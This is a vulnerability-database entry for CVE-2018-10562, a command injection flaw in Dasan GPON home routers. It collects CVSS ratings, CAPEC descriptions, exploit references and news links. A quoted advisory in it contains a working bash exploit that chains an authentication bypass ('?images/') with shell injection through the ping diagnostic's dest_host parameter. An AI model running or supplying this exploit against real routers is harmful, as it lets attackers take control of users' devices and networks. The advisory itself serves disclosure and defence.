Vulnerabilities > CVE-2018-10562 - OS Command Injection vulnerability in Dasannetworks Gpon Router Firmware
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 1 | |
| Hardware | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Command Delimiters An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- Exploiting Multiple Input Interpretation Layers An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
- Argument Injection An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
- OS Command Injection In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Exploit-Db
| description | GPON Routers - Authentication Bypass / Command Injection. CVE-2018-10561,CVE-2018-10562. Remote exploit for Hardware platform |
| file | exploits/hardware/remote/44576.sh |
| id | EDB-ID:44576 |
| last seen | 2018-05-24 |
| modified | 2018-05-03 |
| platform | hardware |
| port | |
| published | 2018-05-03 |
| reporter | Exploit-DB |
| source | https://www.exploit-db.com/download/44576/ |
| title | GPON Routers - Authentication Bypass / Command Injection |
| type | remote |
Packetstorm
| data source | https://packetstormsecurity.com/files/download/147482/gpon-bypassinject.txt |
| id | PACKETSTORM:147482 |
| last seen | 2018-05-07 |
| published | 2018-05-04 |
| reporter | vpnmentor |
| source | https://packetstormsecurity.com/files/147482/GPON-Router-Authentication-Bypass-Comand-Injection.html |
| title | GPON Router Authentication Bypass / Comand Injection |
Seebug
| bulletinFamily | exploit |
| description | ### Overview: We conducted a comprehensive assessment on a number of GPON home routers. Many routers today use GPON internet, and we found a way to bypass all authentication on the devices (CVE-2018-10561). With this authentication bypass, we were also able to unveil another command injection vulnerability (CVE-2018-10562) and execute commands on the device. ### Exploitation: During our analysis of GPON firmwares, we found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562) that could, when combined allow complete control on the device and therefore the network. The first vulnerability exploits the authentication mechanism of the device that has a flaw. This flaw allows any attacker to bypass all authentication. The flaw can be found with the HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick. By appending ?images/ to the URL, the attacker can bypass the endpoint. This works on both HTML pages and GponForm/ For instance, by inserting ``` /menu.html?images/ ``` or ``` /GponForm/diag_FORM?images/ ``` we can manage the device. While looking through the device functionalities, we noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected by the host parameter. Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability. We include the following bash version of the exploit code: ``` #!/bin/bash echo “[+] Sending the Command… “ # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices curl -k -d “XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0” $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo “[+] Waiting….” sleep 3 echo “[+] Retrieving the ouput….” curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’ ``` video: https://youtu.be/2tgRJa58jY0 ### Impact: GPON is a type of passive optical network that uses fiber-optics and is particularly popular. When people use GPON, the routers are provided by ISPs. In the video, you can see that over one million people use this type of network system router. We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise. ### Recommendations: * Check if your router uses the GPON network. * Be aware that GPON routers can be hacked and exploited. * Talk to your ISP to see what they can do to fix the bug. * Warn your friends on Facebook (click here to share) and Twitter (click here to tweet). |
| id | SSV:97258 |
| last seen | 2018-06-26 |
| modified | 2018-05-02 |
| published | 2018-05-02 |
| reporter | My Seebug |
| title | Critical RCE Vulnerability Found in Over a Million GPON Home Routers |
The Hacker News
id THN:EE172E24E32A85AABDE52F47866324C6 last seen 2018-05-08 modified 2018-05-08 published 2018-05-08 reporter Swati Khandelwal source https://thehackernews.com/2018/05/protect-router-hacking.html title A Simple Tool Released to Protect Dasan GPON Routers from Remote Hacking id THN:9C8C2D4F8CFDDE01FAE5FF52244A5073 last seen 2018-05-10 modified 2018-05-10 published 2018-05-10 reporter Swati Khandelwal source https://thehackernews.com/2018/05/botnet-malware-hacking.html title 5 Powerful Botnets Found Exploiting Unpatched GPON Router Flaws id THN:66C2DBEE768691DF8BF72CAE39867B68 last seen 2018-05-23 modified 2018-05-23 published 2018-05-23 reporter Mohit Kumar source https://thehackernews.com/2018/05/hacking-gpon-routers.html title Hackers are exploiting a new zero-day flaw in GPON routers